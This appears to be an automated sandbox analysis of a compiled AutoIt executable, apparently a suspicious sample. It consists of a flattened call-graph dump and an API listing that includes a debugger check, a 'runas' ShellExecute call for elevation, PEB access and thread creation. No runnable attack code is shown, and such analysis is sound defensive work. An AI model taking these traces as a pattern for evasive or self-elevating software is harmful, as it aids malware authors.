105466 cd688f 105465->105466 105467 d0e031 105466->105467 105468 cd4ddd 136 API calls 105466->105468 105469 d3955b 122 API calls 105467->105469 105470 cd68a3 105468->105470 105471 d0e046 105469->105471 105470->105467 105474 cd68ab 105470->105474 105472 d0e067 105471->105472 105473 d0e04a 105471->105473 105476 cf0db6 Mailbox 59 API calls 105472->105476 105475 cd4e4a 84 API calls 105473->105475 105477 d0e052 105474->105477 105478 
cd68b7 105474->105478 105475->105477 105494 d0e0ac Mailbox 105476->105494 105612 d342f8 90 API calls _wprintf 105477->105612 105505 cd6a8c 105478->105505 105481 d0e060 105481->105472 105483 d0e260 105484 cf2d55 _free 58 API calls 105483->105484 105485 d0e268 105484->105485 105486 cd4e4a 84 API calls 105485->105486 105491 d0e271 105486->105491 105490 cf2d55 _free 58 API calls 105490->105491 105491->105490 105493 cd4e4a 84 API calls 105491->105493 105616 d2f7a1 89 API calls 4 library calls 105491->105616 105493->105491 105494->105483 105494->105491 105495 cd7de1 59 API calls 105494->105495 105598 cd750f 105494->105598 105606 cd735d 105494->105606 105613 d2f73d 59 API calls 2 library calls 105494->105613 105614 d2f65e 61 API calls 2 library calls 105494->105614 105615 d3737f 59 API calls Mailbox 105494->105615 105495->105494 105499 cd34d4 105498->105499 105503 cd34f3 _memmove 105498->105503 105501 cf0db6 Mailbox 59 API calls 105499->105501 105500 cf0db6 Mailbox 59 API calls 105502 cd350a 105500->105502 105501->105503 105502->105463 105503->105500 105504->105460 105506 cd6ab5 105505->105506 105507 d0e41e 105505->105507 105622 cd57a6 60 API calls Mailbox 105506->105622 105689 d2f7a1 89 API calls 4 library calls 105507->105689 105510 d0e431 105690 d2f7a1 89 API calls 4 library calls 105510->105690 105511 cd6ad7 105623 cd57f6 67 API calls 105511->105623 105513 cd6aec 105513->105510 105514 cd6af4 105513->105514 105516 cd7667 59 API calls 105514->105516 105518 cd6b00 105516->105518 105517 d0e44d 105520 cd6b61 105517->105520 105624 cf0957 60 API calls __write_nolock 105518->105624 105522 d0e460 105520->105522 105523 cd6b6f 105520->105523 105521 cd6b0c 105525 cd7667 59 API calls 105521->105525 105526 cd5c6f CloseHandle 105522->105526 105524 cd7667 59 API calls 105523->105524 105527 cd6b78 105524->105527 105528 cd6b18 105525->105528 105529 d0e46c 105526->105529 105530 cd7667 59 API calls 105527->105530 105531 cd4750 60 API calls 105528->105531 105532 cd4ddd 136 API calls 
105529->105532 105534 cd6b81 105530->105534 105535 cd6b26 105531->105535 105533 d0e488 105532->105533 105536 d0e4b1 105533->105536 105539 d3955b 122 API calls 105533->105539 105627 cd459b 105534->105627 105625 cd5850 ReadFile SetFilePointerEx 105535->105625 105691 d2f7a1 89 API calls 4 library calls 105536->105691 105543 d0e4a4 105539->105543 105540 cd6b98 105544 cd7b2e 59 API calls 105540->105544 105542 cd6b52 105626 cd5aee SetFilePointerEx SetFilePointerEx 105542->105626 105547 d0e4ac 105543->105547 105548 d0e4cd 105543->105548 105549 cd6ba9 SetCurrentDirectoryW 105544->105549 105545 d0e4c8 105553 cd6d0c Mailbox 105545->105553 105550 cd4e4a 84 API calls 105547->105550 105551 cd4e4a 84 API calls 105548->105551 105555 cd6bbc Mailbox 105549->105555 105550->105536 105552 d0e4d2 105551->105552 105554 cf0db6 Mailbox 59 API calls 105552->105554 105617 cd57d4 105553->105617 105560 d0e506 105554->105560 105557 cf0db6 Mailbox 59 API calls 105555->105557 105559 cd6bcf 105557->105559 105558 cd3bbb 105558->104479 105558->104504 105561 cd522e 59 API calls 105559->105561 105563 cd750f 59 API calls 105560->105563 105562 cd6bda Mailbox __NMSG_WRITE 105561->105562 105564 cd6ce7 105562->105564 105575 d0e7d9 105562->105575 105581 d0e7d1 105562->105581 105583 cd7de1 59 API calls 105562->105583 105678 cd586d 67 API calls _wcscpy 105562->105678 105679 cd6f5d GetStringTypeW 105562->105679 105680 cd6ecc 60 API calls __wcsnicmp 105562->105680 105681 cd6faa GetStringTypeW __NMSG_WRITE 105562->105681 105682 cf363d GetStringTypeW _iswctype 105562->105682 105683 cd68dc 165 API calls 3 library calls 105562->105683 105684 cd7213 59 API calls Mailbox 105562->105684 105594 d0e54f Mailbox 105563->105594 105685 cd5c6f 105564->105685 105566 d0e740 105696 d372df 59 API calls Mailbox 105566->105696 105568 cd6cf3 SetCurrentDirectoryW 105568->105553 105571 d0e762 105697 d4fbce 59 API calls 2 library calls 105571->105697 105574 d0e76f 105576 cf2d55 _free 58 API calls 105574->105576 105700 d2f7a1 89 API 
calls 4 library calls 105575->105700 105576->105553 105579 d0e7f2 105579->105564 105580 cd750f 59 API calls 105580->105594 105699 d2f5f7 59 API calls 4 library calls 105581->105699 105583->105562 105588 cd7de1 59 API calls 105588->105594 105591 d0e792 105698 d2f7a1 89 API calls 4 library calls 105591->105698 105594->105566 105594->105580 105594->105588 105594->105591 105692 d2f73d 59 API calls 2 library calls 105594->105692 105693 d2f65e 61 API calls 2 library calls 105594->105693 105694 d3737f 59 API calls Mailbox 105594->105694 105695 cd7213 59 API calls Mailbox 105594->105695 105595 d0e7ab 105596 cf2d55 _free 58 API calls 105595->105596 105597 d0e7be 105596->105597 105597->105553 105599 cd75af 105598->105599 105603 cd7522 _memmove 105598->105603 105601 cf0db6 Mailbox 59 API calls 105599->105601 105600 cf0db6 Mailbox 59 API calls 105602 cd7529 105600->105602 105601->105603 105604 cf0db6 Mailbox 59 API calls 105602->105604 105605 cd7552 105602->105605 105603->105600 105604->105605 105605->105494 105607 cd7370 105606->105607 105609 cd741e 105606->105609 105608 cf0db6 Mailbox 59 API calls 105607->105608 105611 cd73a2 105607->105611 105608->105611 105609->105494 105610 cf0db6 59 API calls Mailbox 105610->105611 105611->105609 105611->105610 105612->105481 105613->105494 105614->105494 105615->105494 105616->105491 105618 cd5c6f CloseHandle 105617->105618 105619 cd57dc Mailbox 105618->105619 105620 cd5c6f CloseHandle 105619->105620 105621 cd57eb 105620->105621 105621->105558 105622->105511 105623->105513 105624->105521 105625->105542 105626->105520 105628 cd7667 59 API calls 105627->105628 105629 cd45b1 105628->105629 105630 cd7667 59 API calls 105629->105630 105631 cd45b9 105630->105631 105632 cd7667 59 API calls 105631->105632 105633 cd45c1 105632->105633 105634 cd7667 59 API calls 105633->105634 105635 cd45c9 105634->105635 105636 cd45fd 105635->105636 105637 d0d4d2 105635->105637 105638 cd784b 59 API calls 105636->105638 105639 cd8047 59 API calls 105637->105639 
105640 cd460b 105638->105640 105641 d0d4db 105639->105641 105642 cd7d2c 59 API calls 105640->105642 105643 cd7d8c 59 API calls 105641->105643 105644 cd4615 105642->105644 105646 cd4640 105643->105646 105645 cd784b 59 API calls 105644->105645 105644->105646 105649 cd4636 105645->105649 105647 cd4680 105646->105647 105650 cd465f 105646->105650 105660 d0d4fb 105646->105660 105701 cd784b 105647->105701 105652 cd7d2c 59 API calls 105649->105652 105654 cd79f2 59 API calls 105650->105654 105651 cd4691 105655 cd46a3 105651->105655 105658 cd8047 59 API calls 105651->105658 105652->105646 105653 d0d5cb 105656 cd7bcc 59 API calls 105653->105656 105657 cd4669 105654->105657 105659 cd46b3 105655->105659 105662 cd8047 59 API calls 105655->105662 105667 d0d588 105656->105667 105657->105647 105661 cd784b 59 API calls 105657->105661 105658->105655 105664 cd46ba 105659->105664 105665 cd8047 59 API calls 105659->105665 105660->105653 105663 d0d5b4 105660->105663 105673 d0d532 105660->105673 105661->105647 105662->105659 105663->105653 105669 d0d59f 105663->105669 105666 cd8047 59 API calls 105664->105666 105674 cd46c1 Mailbox 105664->105674 105665->105664 105666->105674 105667->105647 105668 cd79f2 59 API calls 105667->105668 105714 cd7924 59 API calls 2 library calls 105667->105714 105668->105667 105671 cd7bcc 59 API calls 105669->105671 105670 d0d590 105672 cd7bcc 59 API calls 105670->105672 105671->105667 105672->105667 105673->105670 105676 d0d57b 105673->105676 105674->105540 105677 cd7bcc 59 API calls 105676->105677 105677->105667 105678->105562 105679->105562 105680->105562 105681->105562 105682->105562 105683->105562 105684->105562 105686 cd5c79 105685->105686 105687 cd5c88 105685->105687 105686->105568 105687->105686 105688 cd5c8d CloseHandle 105687->105688 105688->105686 105689->105510 105690->105517 105691->105545 105692->105594 105693->105594 105694->105594 105695->105594 105696->105571 105697->105574 105698->105595 105699->105575 105700->105579 105702 cd785a 
105701->105702 105703 cd78b7 105701->105703 105702->105703 105705 cd7865 105702->105705 105704 cd7d2c 59 API calls 105703->105704 105711 cd7888 _memmove 105704->105711 105706 d0eb09 105705->105706 105707 cd7880 105705->105707 105708 cd8029 59 API calls 105706->105708 105715 cd7f27 59 API calls Mailbox 105707->105715 105710 d0eb13 105708->105710 105712 cf0db6 Mailbox 59 API calls 105710->105712 105711->105651 105713 d0eb33 105712->105713 105714->105667 105715->105711 105717 cd6d95 105716->105717 105722 cd6ea9 105716->105722 105718 cf0db6 Mailbox 59 API calls 105717->105718 105717->105722 105720 cd6dbc 105718->105720 105719 cf0db6 Mailbox 59 API calls 105726 cd6e31 105719->105726 105720->105719 105722->104620 105724 cd735d 59 API calls 105724->105726 105725 cd750f 59 API calls 105725->105726 105726->105722 105726->105724 105726->105725 105729 cd6240 105726->105729 105754 d26553 59 API calls Mailbox 105726->105754 105727->104623 105728->104625 105755 cd7a16 105729->105755 105731 cd646a 105732 cd750f 59 API calls 105731->105732 105733 cd6484 Mailbox 105732->105733 105733->105726 105736 cd6265 105736->105731 105737 cd750f 59 API calls 105736->105737 105738 d0dff6 105736->105738 105739 cd6799 _memmove 105736->105739 105744 cd7d8c 59 API calls 105736->105744 105747 d0df92 105736->105747 105751 cd7e4f 59 API calls 105736->105751 105760 cd5f6c 60 API calls 105736->105760 105761 cd5d41 59 API calls Mailbox 105736->105761 105762 cd5e72 60 API calls 105736->105762 105763 cd7924 59 API calls 2 library calls 105736->105763 105737->105736 105764 d2f8aa 91 API calls 4 library calls 105738->105764 105765 d2f8aa 91 API calls 4 library calls 105739->105765 105741 d0e004 105745 cd750f 59 API calls 105741->105745 105744->105736 105746 d0e01a 105745->105746 105746->105733 105748 cd8029 59 API calls 105747->105748 105749 d0df9d 105748->105749 105753 cf0db6 Mailbox 59 API calls 105749->105753 105752 cd643b CharUpperBuffW 105751->105752 105752->105736 105753->105739 105754->105726 105756 
cf0db6 Mailbox 59 API calls 105755->105756 105757 cd7a3b 105756->105757 105758 cd8029 59 API calls 105757->105758 105759 cd7a4a 105758->105759 105759->105736 105760->105736 105761->105736 105762->105736 105763->105736 105764->105741 105765->105733 105766->104639 105767->104638 105769 d0d423 105768->105769 105770 cd4196 105768->105770 105769->105770 105771 d0d42c DestroyIcon 105769->105771 105770->104645 105794 d32f94 62 API calls _W_store_winword 105770->105794 105771->105770 105773 cd4098 105772->105773 105793 cd416f Mailbox 105772->105793 105774 cd7a16 59 API calls 105773->105774 105775 cd40a6 105774->105775 105776 d0d3c8 LoadStringW 105775->105776 105777 cd40b3 105775->105777 105780 d0d3e2 105776->105780 105778 cd7bcc 59 API calls 105777->105778 105779 cd40c8 105778->105779 105779->105780 105781 cd40d9 105779->105781 105782 cd7b2e 59 API calls 105780->105782 105783 cd4174 105781->105783 105784 cd40e3 105781->105784 105787 d0d3ec 105782->105787 105785 cd8047 59 API calls 105783->105785 105786 cd7b2e 59 API calls 105784->105786 105790 cd40ed _memset _wcscpy 105785->105790 105786->105790 105788 cd7cab 59 API calls 105787->105788 105787->105790 105789 d0d40e 105788->105789 105792 cd7cab 59 API calls 105789->105792 105791 cd4155 Shell_NotifyIconW 105790->105791 105791->105793 105792->105790 105793->104651 105794->104645 105796 cde6d5 105795->105796 105797 d13aa9 105796->105797 105800 cde73f 105796->105800 105809 cde799 105796->105809 105885 cd9ea0 105797->105885 105799 d13abe 105825 cde970 Mailbox 105799->105825 105909 d39e4a 89 API calls 4 library calls 105799->105909 105802 cd7667 59 API calls 105800->105802 105800->105809 105801 cd7667 59 API calls 105801->105809 105804 d13b04 105802->105804 105806 cf2d40 __cinit 67 API calls 105804->105806 105805 cf2d40 __cinit 67 API calls 105805->105809 105806->105809 105807 d13b26 105807->104719 105808 cd84c0 69 API calls 105808->105825 105809->105801 105809->105805 105809->105807 105811 cde95a 105809->105811 105809->105825 
105810 cd9ea0 331 API calls 105810->105825 105811->105825 105910 d39e4a 89 API calls 4 library calls 105811->105910 105812 d39e4a 89 API calls 105812->105825 105814 cd8d40 59 API calls 105814->105825 105822 cdf195 105914 d39e4a 89 API calls 4 library calls 105822->105914 105823 d13e25 105823->104719 105824 cdea78 105824->104719 105825->105808 105825->105810 105825->105812 105825->105814 105825->105822 105825->105824 105884 cd7f77 59 API calls 2 library calls 105825->105884 105911 d26e8f 59 API calls 105825->105911 105912 d4c5c3 331 API calls 105825->105912 105913 d4b53c 331 API calls Mailbox 105825->105913 105915 cd9c90 59 API calls Mailbox 105825->105915 105916 d493c6 331 API calls Mailbox 105825->105916 105827 cdf4ba 105826->105827 105828 cdf650 105826->105828 105829 cdf4c6 105827->105829 105830 d1441e 105827->105830 105831 cd7de1 59 API calls 105828->105831 106015 cdf290 331 API calls 2 library calls 105829->106015 106017 d4bc6b 331 API calls Mailbox 105830->106017 105837 cdf58c Mailbox 105831->105837 105834 d1442c 105838 cdf630 105834->105838 106018 d39e4a 89 API calls 4 library calls 105834->106018 105836 cdf4fd 105836->105834 105836->105837 105836->105838 105840 cdf5e3 105837->105840 105923 d33c37 105837->105923 105926 d4445a 105837->105926 105935 d3cb7a 105837->105935 105838->104719 105840->105838 106016 cd9c90 59 API calls Mailbox 105840->106016 105844->104719 105845->104719 105846->104719 105847->104657 105848->104662 105849->104719 105850->104664 105851->104664 105852->104664 105853->104719 105854->104719 105855->104719 105857 cd9851 105856->105857 105866 cd984b 105856->105866 105858 cd9857 __itow 105857->105858 105859 cd9899 105857->105859 105860 d0f5d3 __i64tow 105857->105860 105862 d0f4da 105857->105862 105864 cf0db6 Mailbox 59 API calls 105858->105864 106176 cf3698 83 API calls 3 library calls 105859->106176 105860->105860 105867 cf0db6 Mailbox 59 API calls 105862->105867 105872 d0f552 Mailbox _wcscpy 105862->105872 105865 cd9871 105864->105865 
105865->105866 105868 cd7de1 59 API calls 105865->105868 105866->104719 105869 d0f51f 105867->105869 105868->105866 105870 cf0db6 Mailbox 59 API calls 105869->105870 105871 d0f545 105870->105871 105871->105872 105873 cd7de1 59 API calls 105871->105873 106177 cf3698 83 API calls 3 library calls 105872->106177 105873->105872 105874->104719 105875->104719 105876->104719 105877->104714 105878->104714 105879->104714 105880->104714 105881->104714 105882->104714 105883->104714 105884->105825 105886 cd9ebf 105885->105886 105904 cd9eed Mailbox 105885->105904 105887 cf0db6 Mailbox 59 API calls 105886->105887 105887->105904 105888 cf2d40 67 API calls __cinit 105888->105904 105889 cdb475 105890 cd8047 59 API calls 105889->105890 105902 cda057 105890->105902 105891 cdb47a 105892 d10055 105891->105892 105908 d109e5 105891->105908 105919 d39e4a 89 API calls 4 library calls 105892->105919 105895 cf0db6 59 API calls Mailbox 105895->105904 105897 d10064 105897->105799 105898 cd8047 59 API calls 105898->105904 105901 cd7667 59 API calls 105901->105904 105902->105799 105903 d26e8f 59 API calls 105903->105904 105904->105888 105904->105889 105904->105891 105904->105892 105904->105895 105904->105898 105904->105901 105904->105902 105904->105903 105905 d109d6 105904->105905 105907 cda55a 105904->105907 105917 cdc8c0 331 API calls 2 library calls 105904->105917 105918 cdb900 60 API calls Mailbox 105904->105918 105921 d39e4a 89 API calls 4 library calls 105905->105921 105920 d39e4a 89 API calls 4 library calls 105907->105920 105922 d39e4a 89 API calls 4 library calls 105908->105922 105909->105825 105910->105825 105911->105825 105912->105825 105913->105825 105914->105823 105915->105825 105916->105825 105917->105904 105918->105904 105919->105897 105920->105902 105921->105908 105922->105902 106019 d3445a GetFileAttributesW 105923->106019 105927 cd9837 84 API calls 105926->105927 105928 d44494 105927->105928 105929 cd6240 94 API calls 105928->105929 105930 d444a4 105929->105930 105931 d444c9 
105930->105931 105932 cd9ea0 331 API calls 105930->105932 105934 d444cd 105931->105934 106023 cd9a98 59 API calls Mailbox 105931->106023 105932->105931 105934->105840 105936 cd7667 59 API calls 105935->105936 105937 d3cbaf 105936->105937 105938 cd7667 59 API calls 105937->105938 105939 d3cbb8 105938->105939 105940 d3cbcc 105939->105940 106133 cd9b3c 59 API calls 105939->106133 105942 cd9837 84 API calls 105940->105942 105943 d3cbe9 105942->105943 105944 d3cc0b 105943->105944 105945 d3ccea 105943->105945 105950 d3cd1a Mailbox 105943->105950 105946 cd9837 84 API calls 105944->105946 105947 cd4ddd 136 API calls 105945->105947 105948 d3cc17 105946->105948 105949 d3ccfe 105947->105949 105951 cd8047 59 API calls 105948->105951 105952 d3cd16 105949->105952 105955 cd4ddd 136 API calls 105949->105955 105950->105840 105954 d3cc23 105951->105954 105952->105950 105953 cd7667 59 API calls 105952->105953 105956 d3cd4b 105953->105956 105958 d3cc37 105954->105958 105959 d3cc69 105954->105959 105955->105952 105957 cd7667 59 API calls 105956->105957 105960 d3cd54 105957->105960 105961 cd8047 59 API calls 105958->105961 105962 cd9837 84 API calls 105959->105962 105963 cd7667 59 API calls 105960->105963 105964 d3cc47 105961->105964 105965 d3cc76 105962->105965 105966 d3cd5d 105963->105966 105967 cd7cab 59 API calls 105964->105967 105968 cd8047 59 API calls 105965->105968 105969 cd7667 59 API calls 105966->105969 105970 d3cc51 105967->105970 105971 d3cc82 105968->105971 105972 d3cd66 105969->105972 105973 cd9837 84 API calls 105970->105973 106134 d34a31 GetFileAttributesW 105971->106134 105975 cd9837 84 API calls 105972->105975 105977 d3cc5d 105973->105977 105976 d3cd73 105975->105976 105979 cd459b 59 API calls 105976->105979 105980 cd7b2e 59 API calls 105977->105980 105978 d3cc8b 105981 d3cc9e 105978->105981 105982 cd79f2 59 API calls 105978->105982 105983 d3cd8e 105979->105983 105980->105959 105984 cd9837 84 API calls 105981->105984 105990 d3cca4 105981->105990 105982->105981 105985 
cd79f2 59 API calls 105983->105985 105986 d3cccb 105984->105986 105987 d3cd9d 105985->105987 106135 d337ef 75 API calls Mailbox 105986->106135 105989 d3cdd1 105987->105989 105991 cd79f2 59 API calls 105987->105991 105992 cd8047 59 API calls 105989->105992 105990->105950 105993 d3cdae 105991->105993 105994 d3cddf 105992->105994 105993->105989 105997 cd7bcc 59 API calls 105993->105997 105995 cd7b2e 59 API calls 105994->105995 105996 d3cded 105995->105996 105998 cd7b2e 59 API calls 105996->105998 105999 d3cdc3 105997->105999 106000 d3cdfb 105998->106000 106001 cd7bcc 59 API calls 105999->106001 106002 cd7b2e 59 API calls 106000->106002 106001->105989 106003 d3ce09 106002->106003 106004 cd9837 84 API calls 106003->106004 106005 d3ce15 106004->106005 106024 d34071 106005->106024 106007 d3ce26 106008 d33c37 3 API calls 106007->106008 106009 d3ce30 106008->106009 106010 cd9837 84 API calls 106009->106010 106013 d3ce61 106009->106013 106011 d3ce4e 106010->106011 106078 d39155 106011->106078 106014 cd4e4a 84 API calls 106013->106014 106014->105950 106015->105836 106016->105840 106017->105834 106018->105838 106020 d33c3e 106019->106020 106021 d34475 FindFirstFileW 106019->106021 106020->105840 106021->106020 106022 d3448a FindClose 106021->106022 106022->106020 106023->105934 106025 d3408d 106024->106025 106026 d34092 106025->106026 106027 d340a0 106025->106027 106028 cd8047 59 API calls 106026->106028 106029 cd7667 59 API calls 106027->106029 106077 d3409b Mailbox 106028->106077 106030 d340a8 106029->106030 106031 cd7667 59 API calls 106030->106031 106032 d340b0 106031->106032 106033 cd7667 59 API calls 106032->106033 106034 d340bb 106033->106034 106035 cd7667 59 API calls 106034->106035 106036 d340c3 106035->106036 106037 cd7667 59 API calls 106036->106037 106038 d340cb 106037->106038 106039 cd7667 59 API calls 106038->106039 106040 d340d3 106039->106040 106041 cd7667 59 API calls 106040->106041 106042 d340db 106041->106042 106043 cd7667 59 API calls 106042->106043 106044 
d340e3 106043->106044 106045 cd459b 59 API calls 106044->106045 106046 d340fa 106045->106046 106047 cd459b 59 API calls 106046->106047 106048 d34113 106047->106048 106049 cd79f2 59 API calls 106048->106049 106050 d3411f 106049->106050 106051 d34132 106050->106051 106052 cd7d2c 59 API calls 106050->106052 106053 cd79f2 59 API calls 106051->106053 106052->106051 106054 d3413b 106053->106054 106055 d3414b 106054->106055 106056 cd7d2c 59 API calls 106054->106056 106057 cd8047 59 API calls 106055->106057 106056->106055 106058 d34157 106057->106058 106059 cd7b2e 59 API calls 106058->106059 106060 d34163 106059->106060 106136 d34223 59 API calls 106060->106136 106062 d34172 106137 d34223 59 API calls 106062->106137 106064 d34185 106065 cd79f2 59 API calls 106064->106065 106066 d3418f 106065->106066 106077->106007 106079 d39162 __write_nolock 106078->106079 106080 cf0db6 Mailbox 59 API calls 106079->106080 106081 d391bf 106080->106081 106082 cd522e 59 API calls 106081->106082 106083 d391c9 106082->106083 106084 d38f5f GetSystemTimeAsFileTime 106083->106084 106085 d391d4 106084->106085 106086 cd4ee5 85 API calls 106085->106086 106087 d391e7 _wcscmp 106086->106087 106088 d3920b 106087->106088 106089 d392b8 106087->106089 106090 d39734 96 API calls 106088->106090 106091 d39734 96 API calls 106089->106091 106092 d39210 106090->106092 106106 d39284 _wcscat 106091->106106 106096 d392c1 106092->106096 106155 cf40fb 58 API calls __wsplitpath_helper 106092->106155 106094 cd4f0b 74 API calls 106095 d392dd 106094->106095 106097 cd4f0b 74 API calls 106095->106097 106096->106013 106099 d392ed 106097->106099 106098 d39239 _wcscat _wcscpy 106156 cf40fb 58 API calls __wsplitpath_helper 106098->106156 106100 cd4f0b 74 API calls 106099->106100 106102 d39308 106100->106102 106103 cd4f0b 74 API calls 106102->106103 106104 d39318 106103->106104 106105 cd4f0b 74 API calls 106104->106105 106107 d39333 106105->106107 106106->106094 106106->106096 106108 cd4f0b 74 API calls 106107->106108 106109 
d39343 106108->106109 106110 cd4f0b 74 API calls 106109->106110 106111 d39353 106110->106111 106112 cd4f0b 74 API calls 106111->106112 106113 d39363 106112->106113 106138 d398e3 GetTempPathW GetTempFileNameW 106113->106138 106133->105940 106134->105978 106135->105990 106136->106062 106137->106064 106155->106098 106156->106106 106176->105858 106177->105860 106179 cd7a5f 106178->106179 106180 cd7a85 _memmove 106178->106180 106179->106180 106181 cf0db6 Mailbox 59 API calls 106179->106181 106180->104737 106180->106180 106182 cd7ad4 106181->106182 106183 cf0db6 Mailbox 59 API calls 106182->106183 106183->106180 106184->104738 106185 cd1066 106190 cdf76f 106185->106190 106187 cd106c 106188 cf2d40 __cinit 67 API calls 106187->106188 106189 cd1076 106188->106189 106191 cdf790 106190->106191 106223 ceff03 106191->106223 106195 cdf7d7 106196 cd7667 59 API calls 106195->106196 106197 cdf7e1 106196->106197 106198 cd7667 59 API calls 106197->106198 106199 cdf7eb 106198->106199 106200 cd7667 59 API calls 106199->106200 106201 cdf7f5 106200->106201 106202 cd7667 59 API calls 106201->106202 106203 cdf833 106202->106203 106204 cd7667 59 API calls 106203->106204 106205 cdf8fe 106204->106205 106233 ce5f87 106205->106233 106209 cdf930 106210 cd7667 59 API calls 106209->106210 106211 cdf93a 106210->106211 106261 cefd9e 106211->106261 106213 cdf981 106214 cdf991 GetStdHandle 106213->106214 106215 cdf9dd 106214->106215 106216 d145ab 106214->106216 106218 cdf9e5 OleInitialize 106215->106218 106216->106215 106217 d145b4 106216->106217 106268 d36b38 64 API calls Mailbox 106217->106268 106218->106187 106220 d145bb 106269 d37207 CreateThread 106220->106269 106222 d145c7 CloseHandle 106222->106218 106270 ceffdc 106223->106270 106226 ceffdc 59 API calls 106227 ceff45 106226->106227 106228 cd7667 59 API calls 106227->106228 106229 ceff51 106228->106229 106230 cd7bcc 59 API calls 106229->106230 106231 cdf796 106230->106231 106232 cf0162 6 API calls 106231->106232 106232->106195 106234 cd7667 59 
API calls 106233->106234 106235 ce5f97 106234->106235 106236 cd7667 59 API calls 106235->106236 106237 ce5f9f 106236->106237 106277 ce5a9d 106237->106277 106240 ce5a9d 59 API calls 106241 ce5faf 106240->106241 106242 cd7667 59 API calls 106241->106242 106243 ce5fba 106242->106243 106244 cf0db6 Mailbox 59 API calls 106243->106244 106245 cdf908 106244->106245 106246 ce60f9 106245->106246 106247 ce6107 106246->106247 106248 cd7667 59 API calls 106247->106248 106249 ce6112 106248->106249 106250 cd7667 59 API calls 106249->106250 106251 ce611d 106250->106251 106252 cd7667 59 API calls 106251->106252 106253 ce6128 106252->106253 106254 cd7667 59 API calls 106253->106254 106255 ce6133 106254->106255 106256 ce5a9d 59 API calls 106255->106256 106257 ce613e 106256->106257 106258 cf0db6 Mailbox 59 API calls 106257->106258 106259 ce6145 RegisterWindowMessageW 106258->106259 106259->106209 106262 cefdae 106261->106262 106263 d2576f 106261->106263 106265 cf0db6 Mailbox 59 API calls 106262->106265 106280 d39ae7 60 API calls 106263->106280 106267 cefdb6 106265->106267 106266 d2577a 106267->106213 106268->106220 106269->106222 106281 d371ed 65 API calls 106269->106281 106271 cd7667 59 API calls 106270->106271 106272 ceffe7 106271->106272 106273 cd7667 59 API calls 106272->106273 106274 ceffef 106273->106274 106275 cd7667 59 API calls 106274->106275 106276 ceff3b 106275->106276 106276->106226 106278 cd7667 59 API calls 106277->106278 106279 ce5aa5 106278->106279 106279->106240 106280->106266 106282 cd1016 106287 cd4974 106282->106287 106285 cf2d40 __cinit 67 API calls 106286 cd1025 106285->106286 106288 cf0db6 Mailbox 59 API calls 106287->106288 106289 cd497c 106288->106289 106291 cd101b 106289->106291 106294 cd4936 106289->106294 106291->106285 106295 cd493f 106294->106295 106296 cd4951 106294->106296 106297 cf2d40 __cinit 67 API calls 106295->106297 106298 cd49a0 106296->106298 106297->106296 106299 cd7667 59 API calls 106298->106299 106300 cd49b8 GetVersionExW 106299->106300 
106301 cd7bcc 59 API calls 106300->106301 106302 cd49fb 106301->106302 106303 cd7d2c 59 API calls 106302->106303 106306 cd4a28 106302->106306 106304 cd4a1c 106303->106304 106305 cd7726 59 API calls 106304->106305 106305->106306 106307 cd4a93 GetCurrentProcess IsWow64Process 106306->106307 106311 d0d864 106306->106311 106308 cd4aac 106307->106308 106309 cd4b2b GetSystemInfo 106308->106309 106310 cd4ac2 106308->106310 106312 cd4af8 106309->106312 106322 cd4b37 106310->106322 106312->106291 106315 cd4b1f GetSystemInfo 106318 cd4ae9 106315->106318 106316 cd4ad4 106317 cd4b37 2 API calls 106316->106317 106319 cd4adc GetNativeSystemInfo 106317->106319 106318->106312 106320 cd4aef FreeLibrary 106318->106320 106319->106318 106320->106312 106323 cd4ad0 106322->106323 106324 cd4b40 LoadLibraryA 106322->106324 106323->106315 106323->106316 106324->106323 106325 cd4b51 GetProcAddress 106324->106325 106325->106323 106326 13c23b0 106340 13c0000 106326->106340 106328 13c24cc 106343 13c22a0 106328->106343 106346 13c3500 GetPEB 106340->106346 106342 13c068b 106342->106328 106344 13c22a9 Sleep 106343->106344 106345 13c22b7 106344->106345 106347 13c352a 106346->106347 106347->106342 106348 d0fdfc 106352 cdab30 Mailbox _memmove 106348->106352 106353 cdb525 106352->106353 106364 cda057 106352->106364 106374 cd7de1 59 API calls 106352->106374 106376 cd9f37 Mailbox 106352->106376 106381 cdb2b6 106352->106381 106383 cd9ea0 331 API calls 106352->106383 106384 d1086a 106352->106384 106386 d10878 106352->106386 106388 d1085c 106352->106388 106389 cdb21c 106352->106389 106391 cf0db6 59 API calls Mailbox 106352->106391 106394 d26e8f 59 API calls 106352->106394 106396 d4445a 331 API calls 106352->106396 106397 d4df23 106352->106397 106402 cd9c90 59 API calls Mailbox 106352->106402 106406 d4c193 85 API calls 2 library calls 106352->106406 106407 d4c2e0 96 API calls Mailbox 106352->106407 106408 d37956 59 API calls Mailbox 106352->106408 106409 d4bc6b 331 API calls Mailbox 106352->106409 106410 

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CD3B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00CD3B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D952F8,00D952E0,?,?), ref: 00CD3BEB
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                              • Part of subcall function 00CE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00CD3C14,00D952F8,?,?,?), ref: 00CE096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CD3C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D87770,00000010), ref: 00D0D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,00D952F8,?,?,?), ref: 00D0D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D84260,00D952F8,?,?,?), ref: 00D0D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D0D346
                                                              • Part of subcall function 00CD3A46: GetSysColorBrush.USER32(0000000F), ref: 00CD3A50
                                                              • Part of subcall function 00CD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00CD3A5F
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(00000063), ref: 00CD3A76
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(000000A4), ref: 00CD3A88
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(000000A2), ref: 00CD3A9A
                                                              • Part of subcall function 00CD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CD3AC0
                                                              • Part of subcall function 00CD3A46: RegisterClassExW.USER32(?), ref: 00CD3B16
                                                              • Part of subcall function 00CD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CD3A03
